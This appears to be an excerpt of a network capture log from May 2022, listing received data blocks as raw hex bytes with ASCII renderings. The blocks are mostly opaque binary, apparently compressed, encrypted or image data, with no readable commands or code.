                                                                                                                          2022-05-21 07:32:44 UTC1891INData Raw: ca ce 5f ff ce d2 6d fe fa fb f1 ff ff ff ff ff f2 f2 e7 fe b5 b8 71 ff b2 b4 6a ff ff ff ff ff fe fe fe fe b2 b4 6a ff b5 b8 71 fe f2 f3 e7 ff ff ff ff ff fa fa f1 fe ca ce 6c ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e 7d c9 cd 5e 25 ca ce 5f fc c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe d6 d9 84 ff fb fc f5 ff fe fe fe fe df e0 c1 ff b2 b4 6a ff ff ff ff ff fe fe fe fe b2 b4 6a ff df e0 c1 fe ff ff ff ff fb fc f5 ff d6 d9 84 fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f fc c9 cd 5e 25 00 00 00 00 c9 cd 5e ae c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe d2 d5 78 fe f2 f3 d8 fe df e0 c1 fe c4 c7 73 fe fe fe fe fe fe fe fe fe b2 b4 6a fe df e0 c1 fe f2 f3 d8 fe d2 d5 78 fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e
                                                                                                                          Data Ascii: _mqjjql_^__^}^%_^__^jj__^__^%^^^^^^xsjx^^^
                                                                                                                          2022-05-21 07:32:44 UTC1907INData Raw: c4 5c 5d bb f8 5b 61 b6 a4 9e d7 d9 34 d4 e7 99 47 af 3a ba 10 d1 5e d4 40 13 d2 bc 2f f9 a6 83 74 5d 45 86 6e 46 a1 ce c5 71 c1 5d 46 2e 74 18 f4 1b 1b f4 96 5b dc e8 2a 3f 7c 1e de 9b 66 6f c8 78 cc ff 7e e1 f7 03 e6 64 f8 57 d9 cf 3b da e8 9f bf 07 43 0c 7f e9 a5 4f 8a 0a 9e 56 20 ed 1e 81 94 26 e3 bc 99 af aa 73 49 23 23 48 8a 11 5f e3 3c ee 59 21 f1 4d 66 60 b5 73 a0 70 ef f5 1d db 7e c7 ba c5 3f 17 03 fb 46 27 9d 3f ad 31 2b af b7 57 0d 3f 0e 79 fd 97 3e 21 82 6b 07 33 58 ab 18 39 8a cb e7 98 70 65 98 a6 54 12 a1 43 ec 6f 7b a8 ea 06 ef cb 0e af 1d 99 21 94 c4 25 0e 9f 1d 00 30 40 92 6b 90 2f 01 a3 8d 78 61 6e fe fd d6 a5 f1 c0 2f a8 a9 59 5a f2 a9 f7 e0 7b ed da 9b 5a 29 2a 90 b5 05 2f ba 49 50 54 1c 9d d1 3d cd 19 05 5f 82 44 58 c7 4c 92 8e 56 c6
                                                                                                                          Data Ascii: \][a4G:^@/t]EnFq]F.t[*?|fox~dW;COV &sI##H_<Y!Mf`sp~?F'?1+W?y>!k3X9peTCo{!%0@k/xan/YZ{Z)*/IPT=_DXLV
                                                                                                                          2022-05-21 07:32:44 UTC1923INData Raw: 57 ff 3f 11 58 07 f2 a7 68 42 45 1b 31 68 b7 6b 19 b1 73 f0 e4 92 8a d8 65 1e a0 64 4e 0e 52 40 a5 c3 3a ab ea 38 ef 5e 0f 8d 6d 1c bb 7f e0 68 86 59 c5 47 13 14 77 8e e2 18 61 c6 ca c9 b9 73 e7 1c fd d4 e6 ed f7 41 b7 8e f0 93 bb c1 0a 5a e6 10 3d 9f ed 03 9f ee d9 56 35 16 20 a0 c1 05 2d 40 78 e3 5f 44 b8 e0 73 b4 78 96 39 0e cb 13 28 d4 37 7c fa 60 6c 50 2a 77 ae 14 61 16 12 fa 32 d8 c4 3f b9 8e 86 ea 37 c6 6f 53 14 74 23 9b 41 c9 6e a7 0b d0 a4 2a 8e 20 80 55 c1 f3 fb 85 15 58 95 c7 93 0e d5 a6 b5 1e 3f fe 4b 16 7b f5 49 db 31 06 48 1f c0 c8 2b 34 18 b6 69 69 b7 5b d7 9a 0d c9 fb 24 06 eb f7 a8 86 df 63 b2 1e fe e0 1d d0 78 2c 3e 4e f7 42 5b 34 41 d4 af 49 6e c7 18 15 f0 cc 71 4f 1a e5 fe fb c4 75 dc 7f 37 c2 c5 88 f5 2e 60 31 ff bc 1c 41 75 77 37 ac
                                                                                                                          Data Ascii: W?XhBE1hksedNR@:8^mhYGwasAZ=V5 -@x_Dsx9(7|`lP*wa2?7oSt#An* UX?K{I1H+4ii[$cx,>NB[4AInqOu7.`1Auw7
                                                                                                                          2022-05-21 07:32:44 UTC1939INData Raw: 32 ec c5 11 64 a4 7d ec 04 93 d7 8f 79 a9 f2 4e 2b 21 35 24 1d a8 fc 38 ad 88 2b ac 8e 6c 73 4f 82 ec 59 bc c6 2f a4 84 7d c6 85 77 f6 1c 52 57 7c c1 b6 b2 10 72 c1 ba e1 a3 90 5f 35 32 58 07 d4 05 35 5f ef de 2e d6 57 06 1d b1 35 ed 01 0d c7 f9 70 12 3a b5 0b 90 8c 13 db 68 00 e8 f2 7f 1f 30 47 9c 01 55 fa fa b7 45 9d f1 55 14 79 40 67 b4 3a e5 fc c1 5e f9 5d bf da cc eb a9 84 10 bb 62 a5 45 56 38 7c 8f f2 4f 96 65 09 38 2a 85 54 70 56 96 f7 9d 88 ca 4f 77 34 db 7d ae 2c 0a 47 26 75 ba cd ee 0a 24 49 8b ed 35 9b 4a 62 a4 71 a3 e4 55 99 16 e8 5c bc 2c 34 18 5d b7 f5 b2 26 7c a5 e5 f0 69 04 7f 90 8b ce 48 ea 9c 2f e4 f7 42 e8 0e 45 1d e6 cc e7 dc b3 b9 01 ee 8d 04 37 97 8b f1 90 ea 91 0e 0f a6 ea 4e d8 a1 a0 bc 15 1e 20 c1 98 27 96 3d c7 5b a9 f9 3f d0 01
                                                                                                                          Data Ascii: 2d}yN+!5$8+lsOY/}wRW|r_52X5_.W5p:h0GUEUy@g:^]bEV8|Oe8*TpVOw4},G&u$I5JbqU\,4]&|iH/BE7N '=[?
                                                                                                                          2022-05-21 07:32:44 UTC1955INData Raw: 2b 43 3c 14 ee 83 48 bf 34 7e 2a da 2f 5c a6 99 61 e3 41 b1 b6 ad 06 c7 d5 68 9d 43 63 7e 4a 8e 81 3e 8e 4a 35 0a a6 80 59 91 32 b6 80 19 8e 84 32 d9 67 c5 bf ee bd 83 9e ae b7 37 c0 3d bc f0 4f eb c1 db 4a d8 ac 75 9f a7 69 d7 44 60 0d 17 ac 4a b9 c5 a6 58 b9 63 47 4c e8 31 4f 4c d8 7e 32 12 e4 c6 c4 25 64 e9 8e 9c f0 bd bd 57 9e 22 95 73 4d e0 a8 8f 36 cb 23 ab 24 56 1d a7 7a 9f 7c cb 26 e8 e2 53 76 de 61 c3 bd 27 88 c7 da 76 c9 95 b9 7c 3f 66 52 18 2c 28 1e 87 86 04 07 15 fc db 92 8f f2 08 57 13 ec ad 11 65 89 4c 40 f8 4a 13 ca 5f ff 99 fe d8 4b 9a 7e 70 7a 68 de f3 bc 6a c8 1f b8 8a 5b 51 b9 f4 d6 f5 02 14 e1 e8 50 99 dc 09 22 ae e0 77 ea 90 51 f2 6f 94 c8 00 49 9f 9d 5d c4 ac da 9c cc f7 9f 22 f5 d9 55 ef 9e d2 8a 5b 15 79 96 ef d2 41 d9 f0 a1 e2 12
                                                                                                                          Data Ascii: +C<H4~*/\aAhCc~J>J5Y22g7=OJuiD`JXcGL1OL~2%dW"sM6#$Vz|&Sva'v|?fR,(WeL@J_K~pzhj[QP"wQoI]"U[yA
                                                                                                                          2022-05-21 07:32:44 UTC1971INData Raw: cf a9 83 c8 d4 c4 47 e4 b7 5a 47 66 d4 80 9d 7a db 5a 25 b8 72 1d 09 b1 1c 78 9c b4 e9 c8 10 a6 58 f7 80 fc d5 91 94 86 fd 39 b1 c9 66 86 36 1d 40 d5 3a 01 09 e0 6d f1 68 9b 7b 53 e8 72 04 c3 8f 8c 1d fa 9c 39 8c 83 12 ae 7a ca 12 5d 0e 95 23 50 8c 08 50 ee 6b 40 cc 59 8d c7 18 2d 47 a8 76 d6 52 36 b4 51 66 97 2d 57 bf e9 e2 e9 50 6e 24 43 96 74 ed ac 02 fe 73 c5 b4 a1 95 b5 75 a9 71 fe ca c5 cb 39 40 4d 3a 1e 78 5b ec 0f a2 13 bf a5 c1 90 26 88 75 55 b4 08 a3 3f 5f 9b 04 43 17 af ab b9 8d d3 6e 2d 61 4d a2 9c cb fc dc b3 c8 88 3e 51 0f 87 8a 3a 07 2c b9 81 aa c8 a9 ed 37 b6 67 11 70 46 b4 36 95 97 97 41 a3 47 13 67 f3 f6 93 de 38 c7 d8 71 f2 cf e1 a2 99 50 02 3c 02 1f 63 b5 d0 15 e9 53 f7 c3 f8 62 7a 87 4c 20 ab bc c3 dc a6 9a b7 1a 9a af 68 c8 55 98 15
                                                                                                                          Data Ascii: GZGfzZ%rxX9f6@:mh{Sr9z]#PPk@Y-GvR6Qf-WPn$Ctsuq9@M:x[&uU?_Cn-aM>Q:,7gpF6AGg8qP<cSbzL hU
                                                                                                                          2022-05-21 07:32:44 UTC1987INData Raw: 17 a8 67 f8 8d 39 2b d2 80 51 ba c2 16 a3 9e 37 67 80 a2 44 c3 1b f8 e3 22 be 65 d8 5e 0b e8 d8 73 99 a8 22 10 db 78 8f 73 5c d6 5d 1c 60 ed 51 fc 7f 47 5b 49 8a 2d 64 f6 52 93 f4 d2 ab 0d c9 d6 4b 90 ed e1 f3 29 2a a4 50 78 32 7c 12 57 08 16 b8 81 3b 3c a4 d0 23 68 98 ad 0c 60 67 f9 73 2c 38 81 ae 6b 68 28 e5 ed de 2d 6c 75 03 05 48 23 30 12 2f 02 14 f4 61 9b e4 e7 17 12 1c 1b da 2f 71 f1 49 cb f9 5b 37 24 db 34 2d 74 59 ce f8 c5 fd f3 5f ca 2f 76 36 2c da 93 8a 9d 05 83 09 a0 bb 11 b1 c5 d0 7b 8c 03 1d dc 4b d4 79 bd 81 45 1f 6c 22 39 dd 97 30 18 28 3f 81 13 8e f2 58 88 73 05 8b df ab 97 3e 0a c0 6c 2e fe 7a 34 ec 5b ff 32 f9 ac 6d 9f fd 18 3b 2c 68 a8 ea 8e fa 10 e6 d4 75 0e ff d8 90 47 a5 65 a7 a9 61 d7 b4 4d d1 bf 66 91 fd 39 62 15 7c a6 0c 88 8e 95
                                                                                                                          Data Ascii: g9+Q7gD"e^s"xs\]`QG[I-dRK)*Px2|W;<#h`gs,8kh(-luH#0/a/qI[7$4-tY_/v6,{KyEl"90(?Xs>l.z4[2m;,huGeaMf9b|
                                                                                                                          2022-05-21 07:32:44 UTC2003INData Raw: 57 18 b2 61 ae 08 0d 63 38 01 f0 a0 06 89 51 33 77 a9 33 02 d5 35 70 4f f7 fc e0 8a 0e cf bf 49 da fe 54 36 b9 ff a3 1a 82 15 72 3a 27 7d cf 40 6f c0 0f 00 48 fb bd e7 91 f6 0b 86 37 ca 1e 63 b4 37 17 9a ef 03 84 5c 46 46 77 fc c4 b8 3f 9e d7 32 b0 c6 fb 80 a9 5b ae be e2 7e c1 e4 8b 98 ed f2 4e 8a 9e 4c 97 00 91 65 df c0 a3 c1 d2 bc 7f 83 f7 2b c9 32 ce c3 87 72 ec 59 32 9c 52 3d b0 1a 13 62 87 e3 2f 91 b6 ab b0 3d 43 f5 bd c3 d3 23 9c 83 69 42 ff 40 eb b6 34 ff 6a 97 2b fe 53 d1 9a 7a e9 6e 97 d4 f6 9d 5f 2d a0 34 c1 de cf cc 74 3f d5 20 54 6d 59 da c1 62 24 89 f0 43 d4 32 b3 05 6a f1 32 1d 8c 3f cb 69 a7 7f ad 58 01 77 d3 5d 82 8d 1c c5 15 45 bb b9 a7 b4 8d 9e 98 64 a5 fc a7 6f 66 c0 47 12 69 fd 5a b4 f1 23 c4 ad 25 73 55 ba 72 57 54 e0 13 0d 25 39 b6
                                                                                                                          Data Ascii: Wac8Q3w35pOIT6r:'}@oH7c7\FFw?2[~NLe+2rY2R=b/=C#iB@4j+Szn_-4t? TmYb$C2j2?iXw]EdofGiZ#%sUrWT%9
                                                                                                                          2022-05-21 07:32:44 UTC2019INData Raw: 44 d9 1b 80 c0 e4 04 18 28 1f 77 ca ce 4c dd 94 95 bf 34 bc 58 18 ad 91 d2 e0 01 f6 04 74 8e 94 55 e7 05 45 c9 06 91 89 98 82 6a 9f f8 94 78 d9 bc 8a 06 81 78 5f a2 47 6e 7a 96 21 8d 4d 0c a3 46 d5 3b 5c 28 2b 91 f5 9b 64 48 57 b9 a5 8d 86 f6 5a 25 99 86 e3 b9 56 14 ce c6 70 6a 5f fd 02 c0 ce c7 6d 2d f4 36 26 2f ca 55 b9 b1 40 8a 41 0b 2d 05 f4 27 0c 1d 52 b1 ef 1a ed 56 61 42 ba ec a5 68 6c 5c 15 83 21 0c 11 8a 3a 5e d0 67 48 e0 aa 53 41 fc 7d 45 43 b9 a9 ee e0 cd c1 52 fa 28 08 8c 8f b6 00 33 46 f2 71 13 e4 c6 08 a9 8d b9 46 f4 b7 a4 6e d1 fd 07 98 89 48 03 fe 45 02 6c 58 25 22 4e 2a 1c 10 52 90 b1 b0 c5 39 75 a2 83 a8 a8 2b ea 07 4a 92 76 b6 2f 52 55 78 13 7e 9d 51 a0 a8 19 10 04 15 20 94 3f c3 25 d0 4d 08 77 a2 cf c8 45 bf ec 26 1c d0 fa 9f 86 38 64
                                                                                                                          Data Ascii: D(wL4XtUEjxx_Gnz!MF;\(+dHWZ%Vpj_m-6&/U@A-'RVaBhl\!:^gHSA}ECR(3FqFnHElX%"N*R9u+Jv/RUx~Q ?%MwE&8d
                                                                                                                          2022-05-21 07:32:44 UTC2035INData Raw: e6 68 d0 3a 96 fc 4f ef 93 86 03 e3 31 cf 1e 0b d3 b3 48 b6 e5 c0 d8 9f 50 9b 85 5d 66 90 62 73 78 62 cd 2f 4e ef 2b 5e 55 9e 50 a0 05 bf e3 ad c7 b3 98 87 9d 91 06 7e 9f f2 82 b4 a6 93 2f 47 e0 d3 98 b2 12 9d e9 3b 40 cd 04 1b dd b0 b2 a5 58 2f 00 31 d4 51 d5 99 00 9b ab 71 52 c4 34 66 20 4c a0 c1 88 c9 d4 c0 0a 7f bb 99 7c a9 ed 2a de 34 f1 15 40 3a dc f0 a1 45 14 a4 39 db 78 04 9e e7 fc 71 e5 a8 b9 d5 63 48 7b 2d 0a b8 35 5f 4c 86 54 af df 9f dd 33 23 6d bd b5 a8 6f ca 38 84 2c 87 6c 52 91 79 0e d9 5a 38 ff 25 d8 7e 1d 10 39 23 3b 8a cd 49 d8 2a 60 8a b1 e4 4a 3b ea d8 b7 3d 1f 5e 1e 89 74 4c 93 d9 c6 c3 90 d6 da c9 c5 45 2c 6c d6 39 8c 8c 2c d9 9f 71 d6 2e a1 c4 88 18 7e b8 b7 3e d0 6d fe 15 b8 a9 ba 75 d2 21 82 37 ae da 16 a6 17 ad fc dc 68 27 48 05
                                                                                                                          Data Ascii: h:O1HP]fbsxb/N+^UP~/G;@X/1QqR4f L|*4@:E9xqcH{-5_LT3#mo8,lRyZ8%~9#;I*`J;=^tLE,l9,q.~>mu!7h'H
                                                                                                                          2022-05-21 07:32:44 UTC2051INData Raw: 85 48 87 d3 34 d4 77 21 c5 67 54 60 c5 d5 4b 54 6a e9 76 50 48 1f f4 b2 dd b1 b5 32 78 c5 75 6c d7 99 7d 7f d1 09 bc 2f 9f dd 09 81 9d e5 b9 61 5e fe e1 39 c5 86 1f 66 5b ee da 9b b3 3d 13 93 95 f8 0e af 68 d2 28 4a 66 88 e5 26 9b 27 15 bf e1 2b 22 ed d1 9e 0e 90 86 fb 13 01 a9 d5 c0 1b 26 81 aa eb 2c 39 51 43 0c 19 ae 7b af 9e 9a 70 7c 65 ee 91 00 9d a7 ad 38 d5 24 dc db 02 85 be 07 ca a8 ec a8 7b e7 d7 1a 1d 87 2f d5 30 cd 47 a8 3c e1 54 a2 e4 75 0b d1 fd c6 a0 da 87 d6 85 2d f6 13 69 f8 5b 10 5c ef a8 78 27 63 93 2a 5e 3d 9f 34 d0 92 1f 09 9a 4f 92 f9 59 f9 96 ef 02 5b 8a 0e d4 b9 56 e4 69 05 05 53 2f 9e 06 83 42 b9 4f bf 55 59 f7 e2 33 07 49 77 51 f0 f3 42 89 ad c9 3c e1 db 05 fc df f9 ad 24 0b 28 12 44 09 40 01 9b de f4 cf 48 46 fd 05 25 64 cd c7 78
                                                                                                                          Data Ascii: H4w!gT`KTjvPH2xul}/a^9f[=h(Jf&'+"&,9QC{p|e8${/0G<Tu-i[\x'c*^=4OY[ViS/BOUY3IwQB<$(D@HF%dx
                                                                                                                          2022-05-21 07:32:44 UTC2067INData Raw: 74 ed 97 1e d4 22 00 da 70 ea 64 1f c6 f6 77 2a a4 da fa 7f bd ee d4 03 8a d2 27 8c dd a4 36 f3 b5 eb 81 c6 c8 a4 17 2d e6 33 59 e2 54 b6 d0 34 09 c8 c3 fa b9 5b e2 48 35 d1 42 bd 80 28 7a 3e 73 98 77 1a 6f 01 24 f4 6d 73 01 c9 c0 f1 ea ce 9f d3 4e 95 2f 83 b2 db 5b ac 38 b1 34 b6 40 ba 1e 05 9a 5f d2 cb 1c 1a b0 15 66 ad 16 2c bc df 9b df b6 6d 88 f6 34 4b 32 62 b3 91 f0 a3 82 06 3e c0 f3 44 28 0c f7 00 5c 4c d8 7a 71 e3 2d 8f 97 e4 c2 7b 04 bb 32 f7 e3 79 de df c3 e3 02 4c d4 d4 22 d3 66 0f 89 1c e0 e5 0e 3c 75 c8 53 8b a1 7b e1 02 8c 4f 0e 84 38 b7 80 6c 30 f5 b6 40 e4 b6 4e 06 c5 d0 9a db ed 0f 54 3c 5e 6f ec d2 4f 0d 7e c7 5f 52 52 71 a9 c7 ee 0b 98 1d ac ff a4 92 77 4c 8b 82 a2 e1 7f db 8f 21 7a 88 53 c5 cb 43 59 8a 59 67 c8 4d 1a 66 47 c2 fd c9 f2
                                                                                                                          Data Ascii: t"pdw*'6-3YT4[H5B(z>swo$msN/[84@_f,m4K2b>D(\Lzq-{2yL"f<uS{O8l0@NT<^oO~_RRqwL!zSCYYgMfG
                                                                                                                          2022-05-21 07:32:44 UTC2083INData Raw: 53 8b c7 dc d7 8d 1e 46 61 b0 a6 a7 eb 76 28 03 9e 2b 93 75 07 f8 88 bb 5c 6b 38 a0 cd c7 a8 82 72 60 4e 53 24 c9 36 52 bf a0 c1 76 59 94 02 a5 1e 18 d2 7d 40 75 b9 41 af e7 b9 9d 99 c5 01 ff e8 d5 9a be 14 ae 89 da 5c ba 64 b7 26 01 d1 07 48 6e a4 d7 d2 e5 ba f1 d7 a1 02 5f 80 5a 2c 11 57 79 52 35 98 c8 c4 1b 2d 32 dc e3 ed 04 4e 4d a0 b4 4f 7b 53 40 58 20 74 d4 71 4c 68 e9 16 b2 b0 45 c6 70 62 c9 ba 2f 73 0a 6f 1f a5 62 ee 87 54 67 f7 cc 13 13 ec 28 11 42 ea 41 c3 54 25 cf 64 73 cf 35 16 08 0a b1 b1 6f e4 86 58 90 88 84 95 53 97 19 cb fa 42 b8 36 ad 6c ea 10 2b 94 0d de 74 98 ec f6 7d b4 4f bf 83 4f f3 93 45 18 e9 89 0a b5 cb f4 39 28 3a 4c 54 a7 6e 50 b1 22 3a ed 44 35 c6 3b b1 f5 17 3b a8 42 22 90 80 17 3a 27 aa db 2d b6 b7 e7 38 12 17 d8 16 f5 be 5d
                                                                                                                          Data Ascii: SFav(+u\k8r`NS$6RvY}@uA\d&Hn_Z,WyR5-2NMO{S@X tqLhEpb/sobTg(BAT%ds5oXSB6l+t}OOE9(:LTnP":D5;;B":'-8]
                                                                                                                          2022-05-21 07:32:44 UTC2099INData Raw: 6d 1b bf 15 94 ff fd fd dd f3 86 66 12 36 de be 66 94 1b be 4d 31 57 e7 0b 04 63 9c d5 53 fc 92 d7 ac 0a 60 3d 80 52 cb 95 25 9f 3c e8 1b 0e a6 32 8e 6a a2 6b 48 94 c2 8f 8b 09 1e 23 2c a3 8b a6 2e f8 9b 46 08 93 4b e6 4a e0 1b d0 59 fd 70 5d 0f a1 9b d5 6e d3 b2 a5 4b aa 56 df 13 69 66 48 5b 02 24 e3 b5 f4 c9 8c b3 d3 51 e5 75 50 2f af fa 6b 1e 78 57 ae 43 d1 cf 8a 2e 03 6c 45 78 0e 41 3b 03 64 c1 77 06 79 94 ab f0 52 0b a6 aa c0 7f 0f f1 21 04 57 12 07 7c 79 39 82 ea 6c 1c d5 29 81 ab cb ea 2b 60 05 5c 10 62 5c ce 84 02 4b 14 d1 87 ef 15 db 6e cf 70 cb a4 a5 d3 76 43 0a 8c 8a 9a 37 fa ef 8e e6 7c 0a 88 1f e1 e1 07 d5 5d 29 38 00 2f 3a 22 a3 75 a0 3d 63 44 b3 55 d0 7f 06 41 70 08 92 ad c6 e8 80 f5 84 c0 3a 7e 1b 83 17 4b 3b fc 86 1f 5a 73 52 f0 c2 b1 1b
                                                                                                                          Data Ascii: mf6fM1WcS`=R%<2jkH#,.FKJYp]nKVifH[$QuP/kxWC.lExA;dwyR!W|y9l)+`\b\KnpvC7|])8/:"u=cDUAp:~K;ZsR
                                                                                                                          2022-05-21 07:32:44 UTC2115INData Raw: 6c 9d 73 55 2a 34 b0 d2 67 a4 ac 1f 85 b7 49 95 9d a6 0e d6 35 87 ce 4d a2 7e 32 8d 74 d2 90 7b 94 a1 c0 06 0a ae 7c 67 40 d3 d8 f4 1d c5 1e 4d 50 cb c1 a6 8d 67 2d 1c a5 81 8d 0d 6b 6b 75 b1 e0 af 4e 73 a5 27 bc 87 a8 59 dd f4 d4 ff ea ce 44 0c 73 9c 39 67 01 4e 84 9a 49 35 53 e6 52 00 f8 50 64 e7 b4 2b 15 1b 3b b0 15 8a 11 38 4d 80 50 55 0f b6 2f a3 0f c5 ae 64 96 a9 24 ad cd 7d 25 a5 4d a1 bf 05 ee c0 8b 9f e3 bd 14 06 4c 76 37 a2 f5 b8 eb c3 97 e7 f5 d5 85 e4 4e e3 92 18 3b c8 95 34 46 60 f5 ca 73 59 fa 5e e3 62 2c 69 5f 4b 8d 4c e6 66 95 33 db 44 ed f9 a0 d3 23 f8 8c c1 34 cb 1a 11 d1 7a 22 fa b3 f7 5b 75 75 e3 36 8f b5 0d 07 c6 f0 c9 04 0b 5b 62 fd 33 9b 79 f0 cf b6 06 05 b3 da c5 8b 1a 19 13 7c 8e 01 ed bf 70 db 09 83 ff 87 49 95 cd 54 a4 03 85 22
                                                                                                                          Data Ascii: lsU*4gI5M~2t{|g@MPg-kkuNs'YDs9gNI5SRPd+;8MPU/d$}%MLv7N;4F`sY^b,i_KLf3D#4z"[uu6[b3y|pIT"
                                                                                                                          2022-05-21 07:32:44 UTC2131INData Raw: 61 6d f2 7a 5c 00 b9 d0 65 3a 1f 09 74 48 d7 34 f8 d0 ee f1 eb 58 39 6f 98 af a9 02 b3 56 25 20 62 1d 96 bb a7 46 ef d9 ab e0 8b e7 cf 3c 12 72 a2 0f 8d 6a 2d dc 62 6d e7 c8 68 38 80 9c 0c 14 7d b0 0f 27 c7 fd ce 41 13 02 b7 46 6f 1d 1c 2c c4 69 e6 61 b4 2c 1a ae 01 37 41 42 4b 72 1d 5f 75 c1 00 14 9e e0 48 72 f6 28 5f a6 b4 e9 f0 ee 44 43 31 dc 24 d3 63 f5 df ac 4b 3e ef 7b f7 81 1f 1a 5b e7 a0 77 fd d1 08 6e 92 ef 39 b2 6b 2c c7 a4 b6 b7 24 9e 6d 51 59 4c 2d 81 ff 35 dd 35 28 d3 12 75 fa e5 04 6e 91 bb d1 ea b9 45 37 69 38 b5 a8 fc 40 b9 0c 1c 5a 16 54 b4 2e 3d ee 6e 81 85 7e e9 09 34 c0 27 38 8e 06 eb c0 2e fa cb 95 ce 11 0c 03 0d 3d d2 02 af d3 74 21 d6 1d 25 b2 a3 5e ce ae 81 00 5b a2 df 32 8a 4a c7 02 8a 3b 04 19 52 89 b1 7f 2e 8f 67 87 b1 19 c6 2a
                                                                                                                          Data Ascii: amz\e:tH4X9oV% bF<rj-bmh8}'AFo,ia,7ABKr_uHr(_DC1$cK>{[wn9k,$mQYL-55(unE7i8@ZT.=n~4'8.=t!%^[2J;R.g*
                                                                                                                          2022-05-21 07:32:44 UTC2147INData Raw: 43 61 ff 21 a1 66 8a ef da cc 4d 71 a1 a0 0c f6 1c d7 f2 ba cb 22 b9 65 47 38 78 ce 73 ea 05 b5 be ba cd 67 00 3f ea 88 fc 80 63 7b 68 ce ea 3a 5c df e7 dc 2a 64 c5 59 a2 bb 76 db 27 96 7a b1 86 1f 56 16 5c 52 9e 2b b2 fc d9 52 cf 63 b5 d9 65 7b e5 5b 06 d4 58 00 dc 51 7c 8e f8 6a e8 ce 2b 9b d1 b5 6e 78 28 f3 b0 1e cc f2 70 a0 2e 78 a2 3b c6 c6 fe ea 30 2a 95 55 d1 e4 62 fc 9d bb 11 80 ff fa ae c2 04 e5 b0 f2 d6 34 47 09 ee 2e 71 99 98 e9 10 e3 b7 b6 0e f0 87 89 b8 86 27 e9 31 2e e4 9b b8 c0 5f 7d 68 97 9c 94 6f 87 ee ed 9f 73 a9 e1 5e b2 ae 92 da 66 df 56 b9 4b 2d ef ba 80 2e 67 b7 dc 92 52 8a 25 ea f1 3a c9 8f 82 76 94 f4 8d c5 71 15 1e d3 82 9a 9f ff 2d 27 53 31 46 80 dd 60 05 1f 84 af d7 0c 83 90 6e 8b 55 e3 79 c4 9a 31 8b 04 6a 70 44 f2 52 8b 36 ea
                                                                                                                          Data Ascii: Ca!fMq"eG8xsg?c{h:\*dYv'zV\R+Rce{[XQ|j+nx(p.x;0*Ub4G.q'1._}hos^fVK-.gR%:vq-'S1F`nUy1jpDR6
                                                                                                                          2022-05-21 07:32:44 UTC2163INData Raw: e3 b2 be 75 4f 23 45 6e 2e 39 0f 08 c8 a5 99 1a 5e 00 4a 03 43 77 07 67 d5 47 b5 b7 a6 be bc 86 6d 10 2c d5 db ec 29 3b 77 af ab e2 d8 3d 6e 78 70 45 98 30 65 93 28 81 d6 7e 3b be 74 cc f9 a8 2e 7c 69 8d b5 fa 60 d8 ab 2e 2d 7b b2 69 96 b6 c8 1a 58 73 4b 12 bb 50 6d 9c 49 d9 26 0f 32 3b 70 f4 3c 13 48 12 bd 92 72 b3 53 f4 ce 28 fe c4 ff 72 45 16 54 e2 a2 6b 59 b6 f1 5a 63 b3 f8 ed df 31 09 c0 43 f7 9e 1c 03 fe 62 d2 2a 1e c8 9c 0c f2 45 20 41 98 7b cc e9 49 ca 74 08 c5 68 68 50 23 c8 ed 16 82 15 82 8b 0d 1b 86 c2 51 40 93 ea f2 95 a7 93 27 fc 68 cb c8 22 be 18 0d 96 fa 30 54 86 f4 1d 97 d4 0e e3 7a 36 80 d4 b6 50 a5 52 7d ba 65 5f 84 65 45 a7 69 bd 11 70 78 e9 da ef da 5c 81 1e b0 c5 aa 1d 77 c0 59 fc b5 ea 13 db fa 65 57 40 cb 8e fa 43 e1 f3 00 62 af 8f
                                                                                                                          Data Ascii: uO#En.9^JCwgGm,);w=nxpE0e(~;t.|i`.-{iXsKPmI&2;p<HrS(rETkYZc1Cb*E A{IthhP#Q@'h"0Tz6PR}e_eEipx\wYeW@Cb
                                                                                                                          2022-05-21 07:32:44 UTC2179INData Raw: d2 2b 4f a9 9a c8 e7 de f0 b4 9c 02 99 89 c2 85 5e 37 ff 17 cc 94 03 1e b7 b0 31 87 7a 06 fd 19 99 d7 88 13 46 5b 7a 3f c2 f6 5e 40 7c f9 98 7a 26 0e 35 eb d4 cf 23 12 3d 1d e7 8b 93 d9 31 ae 69 f4 96 e8 34 a0 e0 05 49 34 ae cc a2 56 79 7a 39 ad 58 69 8d 53 16 e0 34 ca 4d 25 48 1e fc f6 50 3d 9a e6 68 50 38 74 73 99 0e cb 95 9e e2 57 94 06 9a b6 a4 f1 b0 0e a6 b4 0c 93 1b 44 2e cf 65 8b a0 07 f9 56 85 40 94 e0 ef 9a 15 d3 54 13 dc eb 1d c4 be 0f be 02 49 86 82 e5 72 90 1c 9f 9e 91 29 7f b6 c6 9c ad ca 77 90 13 a3 92 85 12 19 5a bd ed 9b 73 d5 62 dd 3d f9 c0 34 1a 0d 92 f0 28 c5 5c ce ef d6 fb 30 d0 8f a5 ef 50 51 0a 39 b2 13 29 9b 0c a8 5f d5 66 12 6d cf a2 ba 61 fd 77 02 00 84 92 22 c9 af 33 54 d3 ca 3b 60 bb b7 4c 40 63 30 d4 80 59 e2 09 d6 d9 bf a1 ed
                                                                                                                          Data Ascii: +O^71zF[z?^@|z&5#=1i4I4Vyz9XiS4M%HP=hP8tsWD.eV@TIr)wZsb=4(\0PQ9)_fmaw"3T;`L@c0Y
                                                                                                                          2022-05-21 07:32:44 UTC2195INData Raw: 0a d0 77 af 0a 06 9c ae 0c 9e 29 63 22 45 64 4b 05 4f fd 9f 8d 6d b0 db ab a7 4a 14 e1 ce 3d 03 da a4 fb 4a 98 88 a5 99 b4 98 5b 91 c5 61 fa b7 bf 19 dc 54 8b 98 c5 06 ce 67 c7 45 d2 cd a1 b4 db e9 e4 13 25 fa 87 29 89 bb c8 f2 59 88 83 4f bf e8 e9 b2 2a d2 a1 6d 7e 2e 32 0e b8 9b d1 2e fd 39 e3 4e e2 73 b9 b7 70 37 de d2 5b c4 fe 08 ba e9 6f d0 13 68 20 54 66 a3 44 67 ff 10 97 3e 50 49 d3 fc d4 73 f4 4c f3 dc 7d 87 59 ca 12 81 9b 33 e6 ff 8b b0 83 88 2f 49 d7 80 dc 55 28 44 23 73 78 7c 50 2c d3 b4 7f d3 03 b6 ac 38 0d 68 62 26 32 e7 16 61 8a 54 f7 40 0c 43 96 f3 87 5d 4b b4 46 8a 76 f5 85 3a ec c1 2d 3c 69 b4 cd f6 0f a6 1b 11 8f 99 c6 be f3 